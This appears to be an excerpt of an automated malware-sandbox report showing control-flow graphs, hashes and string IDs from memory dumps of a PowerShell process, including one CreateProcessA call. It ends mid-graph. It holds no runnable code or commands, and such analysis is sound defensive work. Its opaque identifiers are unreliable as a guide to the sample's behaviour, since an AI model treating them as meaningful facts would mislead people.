                                  control_flow_graph 210 1ca0f20-1ca0f45 211 1ca11ba-1ca11ed 210->211 212 1ca0f4b-1ca0f50 210->212 222 1ca11ef-1ca120a 211->222 223 1ca120c 211->223 213 1ca0f68-1ca0f6c 212->213 214 1ca0f52-1ca0f58 212->214 217 1ca0f72-1ca0f76 213->217 218 1ca1167-1ca1171 213->218 215 1ca0f5a 214->215 216 1ca0f5c-1ca0f66 214->216 215->213 216->213 220 1ca0f78-1ca0f87 217->220 221 1ca0f89 217->221 224 1ca117f-1ca1185 218->224 225 1ca1173-1ca117c 218->225 227 1ca0f8b-1ca0f8d 220->227 221->227 228 1ca120e-1ca1210 222->228 223->228 229 1ca118b-1ca1197 224->229 230 1ca1187-1ca1189 224->230 227->218 233 1ca0f93-1ca0fb3 227->233 234 1ca12e6-1ca12f0 228->234 235 1ca1216-1ca121a 228->235 231 1ca1199-1ca11b7 229->231 230->231 253 1ca0fd2 233->253 254 1ca0fb5-1ca0fd0 233->254 237 1ca12fb-1ca1301 234->237 238 1ca12f2-1ca12f8 234->238 239 1ca123a 235->239 240 1ca121c-1ca1238 235->240 241 1ca1303-1ca1305 237->241 242 1ca1307-1ca1313 237->242 243 1ca123c-1ca123e 239->243 240->243 247 1ca1315-1ca1330 241->247 242->247 243->234 248 1ca1244-1ca1263 243->248 263 1ca127d-1ca12a2 248->263 264 1ca1265-1ca126b 248->264 258 1ca0fd4-1ca0fd6 253->258 254->258 258->218 261 1ca0fdc-1ca0fde 258->261 265 1ca0fee 261->265 266 1ca0fe0-1ca0fec 261->266 276 1ca12a4-1ca12ad 263->276 277 1ca12c5 263->277 268 1ca126f-1ca127b 264->268 269 1ca126d 264->269 270 1ca0ff0-1ca0ff2 265->270 266->270 268->263 269->263 270->218 271 1ca0ff8-1ca1017 270->271 282 1ca1019-1ca1025 271->282 283 1ca1027 271->283 279 1ca12af-1ca12b2 276->279 280 1ca12b4-1ca12c1 276->280 281 1ca12c8-1ca12e0 277->281 284 1ca12c3 279->284 280->284 281->234 285 1ca1029-1ca102b 282->285 283->285 284->281 285->218 288 1ca1031-1ca1053 285->288 291 1ca106b-1ca10d0 288->291 292 1ca1055-1ca105b 288->292 298 1ca10e8-1ca10ec 291->298 299 1ca10d2-1ca10d8 291->299 293 1ca105f-1ca1061 292->293 294 1ca105d 292->294 293->291 294->291 302 1ca10f3-1ca10f5 298->302 300 1ca10da 299->300 301 1ca10dc-1ca10de 299->301 300->298 301->298 303 1ca110d-1ca1164 302->303 304 1ca10f7-1ca10fd 302->304 305 1ca10ff 304->305 306 1ca1101-1ca1103 304->306 305->303 306->303
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.461295147.0000000001CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_1ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'p$4'p$@#8g$@#8g$$p$$p$$p
                                  • API String ID: 0-3780591650
                                  • Opcode ID: 88cbcf56d6fc4a6226b7d2069de4cb70be8007eff43826444d3eb023f9cc97b2
                                  • Instruction ID: b7f6189571e4c59867e08c52f5e66254a45c3947f1f8b77b5fb993de6e56e8b1
                                  • Opcode Fuzzy Hash: 88cbcf56d6fc4a6226b7d2069de4cb70be8007eff43826444d3eb023f9cc97b2
                                  • Instruction Fuzzy Hash: FCA15970704342DFDB2A5A7D881077E7BE2AFC5258F98806AE645CB292CF72DD41C752

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 308 1ca2bb0-1ca2bd2 309 1ca2bd8-1ca2bdd 308->309 310 1ca2d7c-1ca2d9e 308->310 311 1ca2bdf-1ca2be5 309->311 312 1ca2bf5-1ca2bf9 309->312 313 1ca2be9-1ca2bf3 311->313 314 1ca2be7 311->314 315 1ca2bff-1ca2c03 312->315 316 1ca2d24-1ca2d2e 312->316 313->312 314->312 318 1ca2c43 315->318 319 1ca2c05-1ca2c16 315->319 320 1ca2d3c-1ca2d42 316->320 321 1ca2d30-1ca2d39 316->321 322 1ca2c45-1ca2c47 318->322 319->310 331 1ca2c1c-1ca2c21 319->331 324 1ca2d48-1ca2d54 320->324 325 1ca2d44-1ca2d46 320->325 322->316 326 1ca2c4d-1ca2c51 322->326 328 1ca2d56-1ca2d79 324->328 325->328 326->316 330 1ca2c57-1ca2c5b 326->330 330->316 332 1ca2c61-1ca2c87 330->332 334 1ca2c39-1ca2c41 331->334 335 1ca2c23-1ca2c29 331->335 332->316 342 1ca2c8d-1ca2c91 332->342 334->322 336 1ca2c2b 335->336 337 1ca2c2d-1ca2c37 335->337 336->334 337->334 343 1ca2c93-1ca2c9c 342->343 344 1ca2cb4 342->344 346 1ca2c9e-1ca2ca1 343->346 347 1ca2ca3-1ca2cb0 343->347 345 1ca2cb7-1ca2cc4 344->345 350 1ca2cca-1ca2d21 345->350 348 1ca2cb2 346->348 347->348 348->345
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.461295147.0000000001CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_1ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (op$(op$@#8g$@#8g
                                  • API String ID: 0-2638489151
                                  • Opcode ID: 4057e65fb82f096dc58cdfae9db40fbf4aeac5fc4de5a62f355f861db03e428a
                                  • Instruction ID: 2d1bb279010e3465023843d9ef4dd0f61390de49d2c0fbe5940a18072150f260
                                  • Opcode Fuzzy Hash: 4057e65fb82f096dc58cdfae9db40fbf4aeac5fc4de5a62f355f861db03e428a
                                  • Instruction Fuzzy Hash: E741F830B0421ADFDB1ACF6DC444BAABFE1FB85308F548469E9158B292CB31C941CB91

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 352 1ca0eff-1ca0f45 353 1ca11ba-1ca11ed 352->353 354 1ca0f4b-1ca0f50 352->354 364 1ca11ef-1ca120a 353->364 365 1ca120c 353->365 355 1ca0f68-1ca0f6c 354->355 356 1ca0f52-1ca0f58 354->356 359 1ca0f72-1ca0f76 355->359 360 1ca1167-1ca1171 355->360 357 1ca0f5a 356->357 358 1ca0f5c-1ca0f66 356->358 357->355 358->355 362 1ca0f78-1ca0f87 359->362 363 1ca0f89 359->363 366 1ca117f-1ca1185 360->366 367 1ca1173-1ca117c 360->367 369 1ca0f8b-1ca0f8d 362->369 363->369 370 1ca120e-1ca1210 364->370 365->370 371 1ca118b-1ca1197 366->371 372 1ca1187-1ca1189 366->372 369->360 375 1ca0f93-1ca0fb3 369->375 376 1ca12e6-1ca12f0 370->376 377 1ca1216-1ca121a 370->377 373 1ca1199-1ca11b7 371->373 372->373 395 1ca0fd2 375->395 396 1ca0fb5-1ca0fd0 375->396 379 1ca12fb-1ca1301 376->379 380 1ca12f2-1ca12f8 376->380 381 1ca123a 377->381 382 1ca121c-1ca1238 377->382 383 1ca1303-1ca1305 379->383 384 1ca1307-1ca1313 379->384 385 1ca123c-1ca123e 381->385 382->385 389 1ca1315-1ca1330 383->389 384->389 385->376 390 1ca1244-1ca1263 385->390 405 1ca127d-1ca12a2 390->405 406 1ca1265-1ca126b 390->406 400 1ca0fd4-1ca0fd6 395->400 396->400 400->360 403 1ca0fdc-1ca0fde 400->403 407 1ca0fee 403->407 408 1ca0fe0-1ca0fec 403->408 418 1ca12a4-1ca12ad 405->418 419 1ca12c5 405->419 410 1ca126f-1ca127b 406->410 411 1ca126d 406->411 412 1ca0ff0-1ca0ff2 407->412 408->412 410->405 411->405 412->360 413 1ca0ff8-1ca1017 412->413 424 1ca1019-1ca1025 413->424 425 1ca1027 413->425 421 1ca12af-1ca12b2 418->421 422 1ca12b4-1ca12c1 418->422 423 1ca12c8-1ca12e0 419->423 426 1ca12c3 421->426 422->426 423->376 427 1ca1029-1ca102b 424->427 425->427 426->423 427->360 430 1ca1031-1ca1053 427->430 433 1ca106b-1ca10d0 430->433 434 1ca1055-1ca105b 430->434 440 1ca10e8-1ca10ec 433->440 441 1ca10d2-1ca10d8 433->441 435 1ca105f-1ca1061 434->435 436 1ca105d 434->436 435->433 436->433 444 1ca10f3-1ca10f5 440->444 442 1ca10da 441->442 443 1ca10dc-1ca10de 441->443 442->440 443->440 445 1ca110d-1ca1164 444->445 446 1ca10f7-1ca10fd 444->446 447 1ca10ff 446->447 448 1ca1101-1ca1103 446->448 447->445 448->445
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.461295147.0000000001CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_1ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'p$@#8g$$p$$p
                                  • API String ID: 0-461818845
                                  • Opcode ID: ae3f358bb35f55ceecae169f3a423d6bad526d72bf404f3ffa957e7908ffde3f
                                  • Instruction ID: 9fc4406c943d9f67515490aaf03ff075e9dceea27fa13cf73b61a8ec726b6306
                                  • Opcode Fuzzy Hash: ae3f358bb35f55ceecae169f3a423d6bad526d72bf404f3ffa957e7908ffde3f
                                  • Instruction Fuzzy Hash: 54418B34700346DFEF274A2588007BE7BF2AF85358F488066DA44AF192CB76DD81C721

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 450 1ca182f-1ca185b 451 1ca1861-1ca1866 450->451 452 1ca1ac6-1ca1ade 450->452 453 1ca1868-1ca186e 451->453 454 1ca187e-1ca1882 451->454 465 1ca1ae0-1ca1ae3 452->465 466 1ca1ae4-1ca1b0e 452->466 455 1ca1872-1ca187c 453->455 456 1ca1870 453->456 457 1ca1888-1ca188c 454->457 458 1ca1a73-1ca1a7d 454->458 455->454 456->454 462 1ca188e-1ca189d 457->462 463 1ca189f 457->463 460 1ca1a8b-1ca1a91 458->460 461 1ca1a7f-1ca1a88 458->461 469 1ca1a93-1ca1a95 460->469 470 1ca1a97-1ca1aa3 460->470 471 1ca18a1-1ca18a3 462->471 463->471 465->466 467 1ca1c7b-1ca1cad 466->467 468 1ca1b14-1ca1b19 466->468 485 1ca1caf-1ca1cbb 467->485 486 1ca1cbd 467->486 472 1ca1b1b-1ca1b21 468->472 473 1ca1b31-1ca1b35 468->473 474 1ca1aa5-1ca1ac3 469->474 470->474 471->458 475 1ca18a9-1ca18ab 471->475 477 1ca1b23 472->477 478 1ca1b25-1ca1b2f 472->478 480 1ca1c2a-1ca1c34 473->480 481 1ca1b3b-1ca1b3d 473->481 482 1ca18ca 475->482 483 1ca18ad-1ca18c8 475->483 477->473 478->473 487 1ca1c42-1ca1c48 480->487 488 1ca1c36-1ca1c3f 480->488 489 1ca1b3f-1ca1b4b 481->489 490 1ca1b4d 481->490 484 1ca18cc-1ca18ce 482->484 483->484 484->458 492 1ca18d4-1ca1900 484->492 493 1ca1cbf-1ca1cc1 485->493 486->493 494 1ca1c4a-1ca1c4c 487->494 495 1ca1c4e-1ca1c5a 487->495 497 1ca1b4f-1ca1b51 489->497 490->497 492->458 533 1ca1906-1ca1913 492->533 499 1ca1d0d-1ca1d17 493->499 500 1ca1cc3-1ca1cc9 493->500 501 1ca1c5c-1ca1c78 494->501 495->501 497->480 503 1ca1b57-1ca1b59 497->503 508 1ca1d19-1ca1d1f 499->508 509 1ca1d22-1ca1d28 499->509 505 1ca1ccb-1ca1ccd 500->505 506 1ca1cd7-1ca1cf4 500->506 510 1ca1b5b-1ca1b67 503->510 511 1ca1b69 503->511 505->506 524 1ca1d5a-1ca1d5f 506->524 525 1ca1cf6-1ca1d07 506->525 515 1ca1d2a-1ca1d2c 509->515 516 1ca1d2e-1ca1d3a 509->516 514 1ca1b6b-1ca1b6d 510->514 511->514 514->480 517 1ca1b73-1ca1b75 514->517 518 1ca1d3c-1ca1d57 515->518 516->518 521 1ca1b8f-1ca1b93 517->521 522 1ca1b77-1ca1b7d 517->522 531 1ca1bad-1ca1c27 521->531 532 1ca1b95-1ca1b9b 521->532 527 1ca1b7f 522->527 528 1ca1b81-1ca1b8d 522->528 524->525 525->499 527->521 528->521 534 1ca1b9f-1ca1bab 532->534 535 1ca1b9d 532->535 539 1ca1919-1ca191e 533->539 540 1ca19ac-1ca19eb 533->540 534->531 535->531 542 1ca1920-1ca1926 539->542 543 1ca1936-1ca194f 539->543 562 1ca19f2-1ca1a01 540->562 547 1ca192a-1ca1934 542->547 548 1ca1928 542->548 543->540 553 1ca1951-1ca1973 543->553 547->543 548->543 556 1ca198d-1ca1997 553->556 557 1ca1975-1ca197b 553->557 561 1ca199c-1ca19aa 556->561 558 1ca197f-1ca198b 557->558 559 1ca197d 557->559 558->556 559->556 561->562 566 1ca1a19-1ca1a70 562->566 567 1ca1a03-1ca1a09 562->567 568 1ca1a0b 567->568 569 1ca1a0d-1ca1a0f 567->569 568->566 569->566
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.461295147.0000000001CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_1ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'p$@#8g$tPp$Og
                                  • API String ID: 0-704161447
                                  • Opcode ID: aaed5421eb48ee152ca0965d862f7ba5e78a276502d028dfd1f0164ea2016817
                                  • Instruction ID: 69fce4ddecdaee88d6afff4d47edf5c6f16440f86235b14aec8182aad8784831
                                  • Opcode Fuzzy Hash: aaed5421eb48ee152ca0965d862f7ba5e78a276502d028dfd1f0164ea2016817
                                  • Instruction Fuzzy Hash: 8241C330B00201DFDB26CE69C555BAABBE2AFC8314F9DC099E5099B395CB71DE41CB51

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 571 1ca1827-1ca1829 572 1ca182b-1ca182e 571->572 573 1ca1862-1ca1882 571->573 576 1ca1888-1ca188c 573->576 577 1ca1a73-1ca1a7d 573->577 580 1ca188e-1ca189d 576->580 581 1ca189f 576->581 578 1ca1a8b-1ca1a91 577->578 579 1ca1a7f-1ca1a88 577->579 582 1ca1a93-1ca1a95 578->582 583 1ca1a97-1ca1aa3 578->583 584 1ca18a1-1ca18a3 580->584 581->584 585 1ca1aa5-1ca1ac3 582->585 583->585 584->577 586 1ca18a9-1ca18ab 584->586 588 1ca18ca 586->588 589 1ca18ad-1ca18c8 586->589 590 1ca18cc-1ca18ce 588->590 589->590 590->577 592 1ca18d4-1ca1900 590->592 592->577 599 1ca1906-1ca1913 592->599 600 1ca1919-1ca191e 599->600 601 1ca19ac-1ca19eb 599->601 602 1ca1920-1ca1926 600->602 603 1ca1936-1ca194f 600->603 619 1ca19f2-1ca1a01 601->619 605 1ca192a-1ca1934 602->605 606 1ca1928 602->606 603->601 610 1ca1951-1ca1973 603->610 605->603 606->603 613 1ca198d-1ca1997 610->613 614 1ca1975-1ca197b 610->614 618 1ca199c-1ca19aa 613->618 615 1ca197f-1ca198b 614->615 616 1ca197d 614->616 615->613 616->613 618->619 623 1ca1a19-1ca1a70 619->623 624 1ca1a03-1ca1a09 619->624 625 1ca1a0b 624->625 626 1ca1a0d-1ca1a0f 624->626 625->623 626->623
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.461295147.0000000001CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_1ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'p$tPp$Og
                                  • API String ID: 0-1128046382
                                  • Opcode ID: a0049b6a102fabca3d781c9fc503043fd107a6af0109e9317242ea8f58ad29ed
                                  • Instruction ID: 7a1271deaef9b19580937de2de04cb65b01093b46c30972f2e04ed3b4ba64b94
                                  • Opcode Fuzzy Hash: a0049b6a102fabca3d781c9fc503043fd107a6af0109e9317242ea8f58ad29ed
                                  • Instruction Fuzzy Hash: 20412030B00202DFDB169E69C425BAABBE2AFC4318F9DC099E5449F295CB71CE41CB51

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 775 1ca2ba7-1ca2baa 776 1ca2bac-1ca2bae 775->776 777 1ca2bb0-1ca2bd2 775->777 778 1ca2bd8-1ca2bdd 777->778 779 1ca2d7c-1ca2d9e 777->779 780 1ca2bdf-1ca2be5 778->780 781 1ca2bf5-1ca2bf9 778->781 782 1ca2be9-1ca2bf3 780->782 783 1ca2be7 780->783 784 1ca2bff-1ca2c03 781->784 785 1ca2d24-1ca2d2e 781->785 782->781 783->781 787 1ca2c43 784->787 788 1ca2c05-1ca2c16 784->788 789 1ca2d3c-1ca2d42 785->789 790 1ca2d30-1ca2d39 785->790 791 1ca2c45-1ca2c47 787->791 788->779 800 1ca2c1c-1ca2c21 788->800 793 1ca2d48-1ca2d54 789->793 794 1ca2d44-1ca2d46 789->794 791->785 795 1ca2c4d-1ca2c51 791->795 797 1ca2d56-1ca2d79 793->797 794->797 795->785 799 1ca2c57-1ca2c5b 795->799 799->785 801 1ca2c61-1ca2c87 799->801 803 1ca2c39-1ca2c41 800->803 804 1ca2c23-1ca2c29 800->804 801->785 811 1ca2c8d-1ca2c91 801->811 803->791 805 1ca2c2b 804->805 806 1ca2c2d-1ca2c37 804->806 805->803 806->803 812 1ca2c93-1ca2c9c 811->812 813 1ca2cb4 811->813 815 1ca2c9e-1ca2ca1 812->815 816 1ca2ca3-1ca2cb0 812->816 814 1ca2cb7-1ca2cc4 813->814 819 1ca2cca-1ca2d21 814->819 817 1ca2cb2 815->817 816->817 817->814
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.461295147.0000000001CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_1ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (op$@#8g
                                  • API String ID: 0-2264549459
                                  • Opcode ID: 646ef8028b9e2e25b52921d7a8fc1428893460f4be96629bdbc535a40eecc0d8
                                  • Instruction ID: 6a4bab21f249a5cd69eeb870e7326259870bc767edcd2dcef327b82178520de5
                                  • Opcode Fuzzy Hash: 646ef8028b9e2e25b52921d7a8fc1428893460f4be96629bdbc535a40eecc0d8
                                  • Instruction Fuzzy Hash: 9131A730E0061ADFEB2BCF5DC544BA6BBF1FB84309F948065E9158B591C774DA40CB91

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 821 1ca2baf-1ca2bd2 822 1ca2bd8-1ca2bdd 821->822 823 1ca2d7c-1ca2d9e 821->823 824 1ca2bdf-1ca2be5 822->824 825 1ca2bf5-1ca2bf9 822->825 826 1ca2be9-1ca2bf3 824->826 827 1ca2be7 824->827 828 1ca2bff-1ca2c03 825->828 829 1ca2d24-1ca2d2e 825->829 826->825 827->825 831 1ca2c43 828->831 832 1ca2c05-1ca2c16 828->832 833 1ca2d3c-1ca2d42 829->833 834 1ca2d30-1ca2d39 829->834 835 1ca2c45-1ca2c47 831->835 832->823 844 1ca2c1c-1ca2c21 832->844 837 1ca2d48-1ca2d54 833->837 838 1ca2d44-1ca2d46 833->838 835->829 839 1ca2c4d-1ca2c51 835->839 841 1ca2d56-1ca2d79 837->841 838->841 839->829 843 1ca2c57-1ca2c5b 839->843 843->829 845 1ca2c61-1ca2c87 843->845 847 1ca2c39-1ca2c41 844->847 848 1ca2c23-1ca2c29 844->848 845->829 855 1ca2c8d-1ca2c91 845->855 847->835 849 1ca2c2b 848->849 850 1ca2c2d-1ca2c37 848->850 849->847 850->847 856 1ca2c93-1ca2c9c 855->856 857 1ca2cb4 855->857 859 1ca2c9e-1ca2ca1 856->859 860 1ca2ca3-1ca2cb0 856->860 858 1ca2cb7-1ca2cc4 857->858 863 1ca2cca-1ca2d21 858->863 861 1ca2cb2 859->861 860->861 861->858
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.461295147.0000000001CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_1ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (op$@#8g
                                  • API String ID: 0-2264549459
                                  • Opcode ID: f96cad4de04c7aa9b17b40ef745f5cc3f63410037ccf93e6e220ffdc00cb8212
                                  • Instruction ID: c41de3ac2aec89c9a9f69c2a00f2dccbff791f7fc2a9386577b837ad727c12e0
                                  • Opcode Fuzzy Hash: f96cad4de04c7aa9b17b40ef745f5cc3f63410037ccf93e6e220ffdc00cb8212
                                  • Instruction Fuzzy Hash: 18318530E0021ADFEB6ACF5DC544BAABBF1BB94318F548065E9158B191C774DA40CB91

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 865 1ca2657-1ca267a 866 1ca2680-1ca2685 865->866 867 1ca27f7-1ca2816 865->867 868 1ca269d-1ca26a9 866->868 869 1ca2687-1ca268d 866->869 873 1ca2818-1ca281a 867->873 874 1ca281c 867->874 876 1ca26af-1ca26b2 868->876 877 1ca27a2-1ca27ac 868->877 870 1ca268f 869->870 871 1ca2691-1ca269b 869->871 870->868 871->868 873->874 879 1ca2820-1ca2842 873->879 874->879 876->877 880 1ca26b8-1ca26bf 876->880 881 1ca27ba-1ca27c0 877->881 882 1ca27ae-1ca27b7 877->882 883 1ca2848-1ca284d 879->883 884 1ca29c5-1ca29de 879->884 880->867 885 1ca26c5-1ca26ca 880->885 886 1ca27c2-1ca27c4 881->886 887 1ca27c6-1ca27d2 881->887 888 1ca284f-1ca2855 883->888 889 1ca2865-1ca2869 883->889 899 1ca29e0-1ca29e1 884->899 900 1ca29e4-1ca29e6 884->900 894 1ca26cc-1ca26d2 885->894 895 1ca26e2-1ca26e6 885->895 890 1ca27d4-1ca27f4 886->890 887->890 891 1ca2859-1ca2863 888->891 892 1ca2857 888->892 896 1ca286f-1ca2873 889->896 897 1ca2970-1ca297a 889->897 891->889 892->889 901 1ca26d6-1ca26e0 894->901 902 1ca26d4 894->902 895->877 907 1ca26ec-1ca26f0 895->907 905 1ca28b3 896->905 906 1ca2875-1ca2886 896->906 903 1ca2988-1ca298e 897->903 904 1ca297c-1ca2985 897->904 901->895 902->895 911 1ca2990-1ca2992 903->911 912 1ca2994-1ca29a0 903->912 908 1ca28b5-1ca28b7 905->908 906->884 923 1ca288c-1ca2891 906->923 913 1ca26f2-1ca270e 907->913 914 1ca2710 907->914 908->897 916 1ca28bd-1ca28c1 908->916 918 1ca29a2-1ca29c2 911->918 912->918 915 1ca2712-1ca2714 913->915 914->915 915->877 920 1ca271a-1ca271d 915->920 916->897 921 1ca28c7-1ca28cb 916->921 931 1ca2727 920->931 926 1ca28ee 921->926 927 1ca28cd-1ca28d6 921->927 928 1ca28a9-1ca28b1 923->928 929 1ca2893-1ca2899 923->929 934 1ca28f1-1ca28fe 926->934 932 1ca28d8-1ca28db 927->932 933 1ca28dd-1ca28ea 927->933 928->908 935 1ca289b 929->935 936 1ca289d-1ca28a7 929->936 940 1ca272e-1ca2730 931->940 938 1ca28ec 932->938 933->938 946 1ca2900-1ca2906 934->946 947 1ca2916-1ca296d 934->947 935->928 936->928 938->934 944 1ca2748-1ca279f 940->944 945 1ca2732-1ca2738 940->945 949 1ca273a 945->949 950 1ca273c-1ca273e 945->950 952 1ca290a-1ca290c 946->952 953 1ca2908 946->953 949->944 950->944 952->947 953->947
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.461295147.0000000001CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_1ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'p$@#8g
                                  • API String ID: 0-2944096523
                                  • Opcode ID: b62e4cafa5f4bd66a55aff582dbdbe1ecca575df73b0c7b2276432cc13fbd6cf
                                  • Instruction ID: b2906eaf3b877c674655f3ec64ba3a4ba7f6c201ed3970de2e80321d6aa6cd9b
                                  • Opcode Fuzzy Hash: b62e4cafa5f4bd66a55aff582dbdbe1ecca575df73b0c7b2276432cc13fbd6cf
                                  • Instruction Fuzzy Hash: 77217F34A01226DFDB66DE6DC554A69BFE1BF94218F98806AD408CB221DB31CF80CB91

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 954 1ca106f-1ca10d0 961 1ca10e8-1ca10ec 954->961 962 1ca10d2-1ca10d8 954->962 965 1ca10f3-1ca10f5 961->965 963 1ca10da 962->963 964 1ca10dc-1ca10de 962->964 963->961 964->961 966 1ca110d-1ca1164 965->966 967 1ca10f7-1ca10fd 965->967 968 1ca10ff 967->968 969 1ca1101-1ca1103 967->969 968->966 969->966
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.461295147.0000000001CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_1ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'p$$p
                                  • API String ID: 0-1423004790
                                  • Opcode ID: 5550f3440f3690b995a602f53ea007424a4c4543d8804836523ddd9705754d91
                                  • Instruction ID: e94ce37370a474b9ad7a925eb18f51242978ff55c43c3bb2fc35d075da06f719
                                  • Opcode Fuzzy Hash: 5550f3440f3690b995a602f53ea007424a4c4543d8804836523ddd9705754d91
                                  • Instruction Fuzzy Hash: 41014974700151DFDF2B96A5A40066EBB72ABCC314F548026DA056A252CB32ED02C765

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 971 1b770ac-1b77151 974 1b77153-1b7716a 971->974 975 1b7719a-1b771c2 971->975 974->975 980 1b7716c-1b77171 974->980 978 1b771c4-1b771d8 975->978 979 1b77208-1b7725e 975->979 978->979 987 1b771da-1b771df 978->987 989 1b772a4-1b7739b CreateProcessA 979->989 990 1b77260-1b77274 979->990 981 1b77194-1b77197 980->981 982 1b77173-1b7717d 980->982 981->975 984 1b77181-1b77190 982->984 985 1b7717f 982->985 984->984 988 1b77192 984->988 985->984 991 1b77202-1b77205 987->991 992 1b771e1-1b771eb 987->992 988->981 1008 1b773a4-1b77489 989->1008 1009 1b7739d-1b773a3 989->1009 990->989 997 1b77276-1b7727b 990->997 991->979 994 1b771ef-1b771fe 992->994 995 1b771ed 992->995 994->994 998 1b77200 994->998 995->994 999 1b7729e-1b772a1 997->999 1000 1b7727d-1b77287 997->1000 998->991 999->989 1002 1b7728b-1b7729a 1000->1002 1003 1b77289 1000->1003 1002->1002 1004 1b7729c 1002->1004 1003->1002 1004->999 1021 1b7748b-1b7748f 1008->1021 1022 1b77499-1b7749d 1008->1022 1009->1008 1021->1022 1023 1b77491 1021->1023 1024 1b7749f-1b774a3 1022->1024 1025 1b774ad-1b774b1 1022->1025 1023->1022 1024->1025 1028 1b774a5 1024->1028 1026 1b774b3-1b774b7 1025->1026 1027 1b774c1-1b774c5 1025->1027 1026->1027 1029 1b774b9 1026->1029 1030 1b774c7-1b774f0 1027->1030 1031 1b774fb-1b77506 1027->1031 1028->1025 1029->1027 1030->1031 1035 1b77507 1031->1035 1035->1035
                                  APIs
                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 01B7737F
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.461263729.0000000001B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_1b70000_powershell.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: db865416416dd3cb9a9b0f848ea96171aa29430fdfe2d6d80207c9b469582493
                                  • Instruction ID: 2e2871db8c179f2d921195a8a4b26cfa1e7c481479c51da8e61f63e21a562475
                                  • Opcode Fuzzy Hash: db865416416dd3cb9a9b0f848ea96171aa29430fdfe2d6d80207c9b469582493
                                  • Instruction Fuzzy Hash: 54C11571D002198FDB25CFA8C885BEDBBB1FF09304F0095A9D969B7250DB749A85CF94

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1036 1b770b8-1b77151 1038 1b77153-1b7716a 1036->1038 1039 1b7719a-1b771c2 1036->1039 1038->1039 1044 1b7716c-1b77171 1038->1044 1042 1b771c4-1b771d8 1039->1042 1043 1b77208-1b7725e 1039->1043 1042->1043 1051 1b771da-1b771df 1042->1051 1053 1b772a4-1b7739b CreateProcessA 1043->1053 1054 1b77260-1b77274 1043->1054 1045 1b77194-1b77197 1044->1045 1046 1b77173-1b7717d 1044->1046 1045->1039 1048 1b77181-1b77190 1046->1048 1049 1b7717f 1046->1049 1048->1048 1052 1b77192 1048->1052 1049->1048 1055 1b77202-1b77205 1051->1055 1056 1b771e1-1b771eb 1051->1056 1052->1045 1072 1b773a4-1b77489 1053->1072 1073 1b7739d-1b773a3 1053->1073 1054->1053 1061 1b77276-1b7727b 1054->1061 1055->1043 1058 1b771ef-1b771fe 1056->1058 1059 1b771ed 1056->1059 1058->1058 1062 1b77200 1058->1062 1059->1058 1063 1b7729e-1b772a1 1061->1063 1064 1b7727d-1b77287 1061->1064 1062->1055 1063->1053 1066 1b7728b-1b7729a 1064->1066 1067 1b77289 1064->1067 1066->1066 1068 1b7729c 1066->1068 1067->1066 1068->1063 1085 1b7748b-1b7748f 1072->1085 1086 1b77499-1b7749d 1072->1086 